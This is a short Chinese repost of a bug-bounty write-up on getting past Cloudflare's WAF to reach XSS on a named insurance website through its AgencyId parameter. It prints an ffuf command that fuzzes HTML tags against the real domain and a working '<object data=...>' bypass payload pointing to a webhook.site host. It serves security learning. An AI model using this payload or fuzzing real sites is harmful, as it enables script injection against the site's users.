一则绕过 Cloudflare WAF 实现 XSS 的案例

原文链接: https://mp.weixin.qq.com/s?__biz=MjM5Mzc4MzUzMQ==&mid=2650261410&idx=1&sn=2635358d53df0250ae5cb8d795b1e3d0

一则绕过 Cloudflare WAF 实现 XSS 的案例

骨哥说事 骨哥说事 2025-07-15 04:07

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

****# 防走失:https://gugesay.com/archives/4544

**不想错过任何消息?设置星标↓ ↓ ↓


一则绕过 Cloudflare WAF 实现 XSS 的案例

通过前期侦察,白帽小哥发现一处页面在 HTML 渲染时没有对AgencyId 参数的输入进行有效清理:

file

但是很不幸设置 iframe 的源会触发 WAF 拦截,在尝试包含

<script>

<img>

标签时,同样会发生拦截。

file

白帽小哥尝试使用参数污染‘走私’源代码,但同样被阻止。

为了搜索潜在标签,小哥尝试对主页进行模糊测试:

> ffuf -u 'https://www.blueinsurance.ie/<FUZZ>' -c -w /usr/share/seclists/Miscellaneous/Web/html-tags.txt -mc all -fc 403 -rate 5

很幸运,大多数 WAF 的默认设置并不好,可以通过使用

<object>

标签进行绕过。

<object data=https://webhook.site/XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX>

file

你学到了么?

原文:https://infosecwriteups.com/xss-with-cloudflare-waf-bypass-zurich-insurance-4cdfc05b6e2d

  • END –

加入星球,随时交流:

*(会员统一定价):128元/年(0.35元/天)***
一则绕过 Cloudflare WAF 实现 XSS 的案例

感谢阅读,如果觉得还不错的话,欢迎分享给更多喜爱的朋友~